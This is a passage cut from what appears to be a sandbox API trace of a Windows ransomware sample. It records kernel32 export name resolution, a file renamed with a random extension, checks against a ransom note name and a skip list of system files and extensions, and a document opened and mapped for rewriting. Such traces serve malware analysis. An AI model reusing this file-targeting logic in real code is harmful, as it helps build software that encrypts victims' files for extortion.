out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.246] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.246] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.246] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.246] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.246] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.246] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.246] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.246] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.246] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.247] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.247] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.247] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.247] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.247] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.247] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.247] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.247] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.247] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.247] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.247] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.247] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.247] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.247] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.247] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.247] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.247] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.247] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.247] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.247] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.248] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.248] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.248] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.248] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.248] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.248] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.248] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.248] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.248] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.248] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.248] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.248] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.248] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.248] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.248] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.248] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.248] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.248] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.249] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.249] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.249] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.249] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.249] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.249] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.249] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.249] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.249] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.249] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.249] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.249] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.249] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.249] lstrlenA (lpString="DELETEATOM") returned 10 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.249] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.249] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.249] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.249] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.249] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.250] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.250] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.250] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.250] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.250] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.250] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.250] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.250] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.250] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.250] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.250] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.250] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.250] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.250] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.250] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.250] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.250] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.250] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.250] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.250] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.251] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.251] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.251] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.251] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.251] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.251] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.251] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.251] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.251] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.251] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.251] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.251] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.251] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.251] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.251] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.251] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.251] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.251] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.252] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.252] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav") returned 97 [0083.252] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav.oHLiVj") returned 104 [0083.252] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\ndz9b2ijqzck3z259n.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav.oHLiVj" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\ndz9b2ijqzck3z259n.wav.ohlivj"), dwFlags=0x0) returned 1 [0083.252] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.253] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.253] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.253] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97c2500, ftCreationTime.dwHighDateTime=0x1d4d250, ftLastAccessTime.dwLowDateTime=0xb4da8a10, ftLastAccessTime.dwHighDateTime=0x1d4cc2e, ftLastWriteTime.dwLowDateTime=0xb4da8a10, ftLastWriteTime.dwHighDateTime=0x1d4cc2e, nFileSizeHigh=0x0, nFileSizeLow=0x421c, dwReserved0=0x0, dwReserved1=0x0, cFileName="skBGg8NuGv.pptx", cAlternateFileName="SKBGG8~1.PPT")) returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="autorun.inf") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="boot.ini") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="desktop.ini") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="ntuser.dat") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="iconcache.db") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="bootsect.bak") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="ntuser.dat.log") returned 1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="thumbs.db") returned -1 [0083.253] lstrcmpiW (lpString1="skBGg8NuGv.pptx", lpString2="Bootfont.bin") returned 1 [0083.253] lstrlenW (lpString="skBGg8NuGv.pptx") returned 15 [0083.253] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0083.253] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0083.253] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0083.254] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0083.255] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.255] lstrlenW (lpString="skBGg8NuGv.pptx") returned 15 [0083.255] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0083.255] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="skBGg8NuGv.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx" [0083.255] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\skBGg8NuGv.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\skbgg8nugv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0083.256] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=16924) returned 1 [0083.256] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0083.256] 